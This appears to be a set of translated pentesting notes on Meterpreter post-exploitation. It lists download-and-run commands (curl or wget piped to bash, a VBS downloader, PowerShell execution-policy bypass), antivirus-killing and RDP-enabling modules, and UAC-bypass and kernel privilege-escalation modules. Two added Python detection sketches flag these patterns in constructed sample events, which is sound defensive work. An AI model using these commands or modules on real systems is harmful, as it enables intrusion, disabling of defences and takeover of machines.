Meterpreter and privilege escalation

Downloading files remotely

linux:
wget URL
curl URL -o output_file_name
without writing a file to disk (the script is piped straight into a shell):
wget -qO - url | bash
curl url | bash

windows:
vbs (save as xxx.vbs):
Set post = CreateObject("Msxml2.XMLHTTP")
Set shell = CreateObject("Wscript.Shell")   ' created by the original snippet but not used below
' synchronous GET of the file to download (third argument 0 = not asynchronous)
post.open "GET", "http://server_ip/fileName", 0
post.send()
' write the response body to disk through an ADODB.Stream
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3          ' adModeReadWrite
aGet.Type = 1          ' adTypeBinary
aGet.Open()
aGet.Write(post.responseBody)
aGet.SaveToFile "path\name_to_save_as (e.g. c:\xx.exe)", 2   ' 2 = adSaveCreateOverWrite
Run: cscript xxx.vbs

powershell (the command is quoted so cmd.exe passes it to -c as one argument):
powershell -exec bypass -c "(New-Object System.Net.WebClient).DownloadFile('URL/filename','C:\path\filename')"
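The download commands above all leave a distinctive process command line (wget or curl piped into a shell, PowerShell with an execution-policy bypass calling WebClient.DownloadFile, cscript launching a .vbs). The following is an added detection example, not code from the original notes: it runs a few regular-expression rules over constructed process-creation events and returns the ones that match. The hosts, users, IP addresses (RFC 5737 range) and paths are made up for the sample.

```python
"""Flag process command lines that match the download-and-run patterns
listed in the notes. SAMPLE_EVENTS is constructed data, not real telemetry."""
import re

# Rule order is fixed so that the list of hits is deterministic.
RULES = [
    # wget/curl whose output is piped straight into a shell (nothing written to disk)
    ("pipe_to_shell", re.compile(r"\b(?:wget|curl)\b[^|]*\|\s*(?:ba|z|da)?sh\b", re.I)),
    # PowerShell started with an execution-policy bypass switch
    ("ps_exec_bypass", re.compile(r"powershell.*?(?:-exec|-ep|-executionpolicy)\s+bypass\b", re.I)),
    # WebClient download methods invoked from a PowerShell command line
    ("ps_webclient_download", re.compile(r"powershell.*?\bDownload(?:File|String|Data)\s*\(", re.I)),
    # cscript/wscript executing a VBScript file
    ("cscript_vbs", re.compile(r"\b[cw]script(?:\.exe)?\b.*?\.vbs\b", re.I)),
]

# Constructed sample process-creation events (host, user, command line).
SAMPLE_EVENTS = [
    {"host": "web01", "user": "www-data",
     "cmd": "wget -qO - http://203.0.113.5/s.sh | bash"},
    {"host": "web01", "user": "deploy",
     "cmd": "curl https://repo.example.org/pkg.tgz -o pkg.tgz"},           # benign download
    {"host": "ws07", "user": "alice",
     "cmd": "powershell -exec bypass -c (New-Object System.Net.WebClient)"
            ".DownloadFile('http://203.0.113.5/a.exe','C:\\Users\\Public\\a.exe')"},
    {"host": "ws07", "user": "alice",
     "cmd": "cscript C:\\Users\\Public\\get.vbs"},
    {"host": "ws09", "user": "bob",
     "cmd": "powershell -File C:\\scripts\\backup.ps1"},                   # benign script
]


def classify(cmd: str) -> list[str]:
    """Return the names of every rule that matches the command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan_commands(events: list[dict]) -> list[dict]:
    """Return one alert per event that matched at least one rule."""
    alerts = []
    for ev in events:
        hits = classify(ev["cmd"])
        if hits:
            alerts.append({"host": ev["host"], "user": ev["user"], "rules": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_commands(SAMPLE_EVENTS):
        print(f"{alert['host']:6} {alert['user']:9} {', '.join(alert['rules'])}")
```

Three of the five constructed events are flagged; the plain `curl -o` download and the `powershell -File` invocation are not, which is the distinction a rule set like this has to keep so that ordinary package fetches and scheduled scripts do not drown the alerts.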


Privilege escalation

Post-exploitation modules: post

Vulnerability discovery:

    Application vulnerabilities {version-specific vulnerabilities, flaws in the application itself ...}

    Service vulnerabilities {port-based, system-service-based ...}

    System kernel vulnerabilities {privilege escalation, CVE-2018-8120}

Post-exploitation modules:

show post    list the post modules

    run windows/manage/killav    kills antivirus processes

    windows/manage/enable_rdp    opens port 3389 (requires privileges)

    ...

Privilege escalation:

    UAC escalation: UAC = User Account Control

    exploit/windows/local/ask

    parameters: name, session

    bypassuac:

    exploit/windows/local/bypassuac_eventvwr

    exploit/windows/local/bypassuac_comhijack

    exploit/windows/local/bypassuac_injection

    exploit/windows/local/bypassuac_windows_store_filesys

    Local privilege escalation vulnerabilities:

    CVE-2018-8120: exploit/windows/local/ms18_8120_win32k_privesc
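The UAC-bypass modules listed above rely on per-user registry data that an auto-elevating Windows binary trusts: the eventvwr technique replaces the user's handler for .msc files under HKCU\Software\Classes\mscfile\shell\open\command and then starts eventvwr.exe, and the COM-hijack variant registers an InprocServer32 for a CLSID under HKCU. Those registry paths come from the public descriptions of the techniques, not from these notes. The following is an added detection example, not code from the original notes or from Metasploit: it checks constructed Sysmon-style registry-set and process-creation records for writes to those keys and for eventvwr.exe spawning anything other than mmc.exe. The SIDs, paths and GUID in the sample are made up.

```python
"""Detection sketch for UAC-bypass artefacts in user-writable registry keys.
SAMPLE_EVENTS is constructed Sysmon-style data, not real telemetry."""
import ntpath
import re

# Keys that a medium-integrity process should not normally be writing.
SUSPICIOUS_KEYS = [
    ("mscfile_handler_hijack",
     re.compile(r"^HKCU\\Software\\Classes\\mscfile\\shell\\open\\command", re.I)),
    ("hkcu_com_inprocserver",
     re.compile(r"^HKCU\\Software\\Classes\\CLSID\\\{[0-9A-Fa-f-]+\}\\InprocServer32", re.I)),
]

# Constructed sample records: a registry write from a temp-dir binary, eventvwr
# launching that binary, a benign eventvwr->mmc launch, a machine-wide COM
# registration by an installer, and a per-user COM registration by the same binary.
SAMPLE_EVENTS = [
    {"type": "registry_set", "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\stage.exe",
     "key": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\mscfile\\shell\\open\\command\\(Default)",
     "value": "C:\\Users\\alice\\AppData\\Local\\Temp\\stage.exe"},
    {"type": "process_create", "parent": "C:\\Windows\\System32\\eventvwr.exe",
     "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\stage.exe"},
    {"type": "process_create", "parent": "C:\\Windows\\System32\\eventvwr.exe",
     "image": "C:\\Windows\\System32\\mmc.exe"},
    {"type": "registry_set", "image": "C:\\Program Files\\Vendor\\setup.exe",
     "key": "HKLM\\Software\\Classes\\CLSID\\{0A1B2C3D-0000-4000-8000-000000000001}\\InprocServer32\\(Default)",
     "value": "C:\\Program Files\\Vendor\\vendor.dll"},
    {"type": "registry_set", "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\stage.exe",
     "key": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\CLSID\\{0A1B2C3D-0000-4000-8000-000000000001}\\InprocServer32\\(Default)",
     "value": "C:\\Users\\alice\\AppData\\Local\\Temp\\evil.dll"},
]


def normalize_key(key: str) -> str:
    """Map the HKU\\<user SID>\\ and HKEY_CURRENT_USER\\ spellings onto HKCU\\."""
    key = re.sub(r"^HKU\\S-1-5-21-[0-9-]+\\", r"HKCU\\", key, flags=re.I)
    key = re.sub(r"^HKEY_CURRENT_USER\\", r"HKCU\\", key, flags=re.I)
    return key


def check_event(ev: dict) -> list[str]:
    """Return the names of the indicators present in one event."""
    hits = []
    if ev["type"] == "registry_set":
        key = normalize_key(ev["key"])
        hits.extend(name for name, rx in SUSPICIOUS_KEYS if rx.match(key))
    elif ev["type"] == "process_create":
        parent = ntpath.basename(ev["parent"]).lower()
        child = ntpath.basename(ev["image"]).lower()
        # eventvwr.exe is a launcher for mmc.exe; any other child is unexpected.
        if parent == "eventvwr.exe" and child != "mmc.exe":
            hits.append("eventvwr_unexpected_child")
    return hits


def scan_uac_events(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (event index, indicators) for every event with at least one hit."""
    findings = []
    for i, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            findings.append((i, hits))
    return findings


if __name__ == "__main__":
    for idx, hits in scan_uac_events(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The HKLM write by the installer is deliberately left unflagged: machine-wide COM registration by an elevated installer is routine, whereas the same key shape under the user's own hive is what the bypass depends on. Setting UAC to "Always notify" removes the silent auto-elevation these modules need, and the ask module still produces a consent prompt that a user can decline.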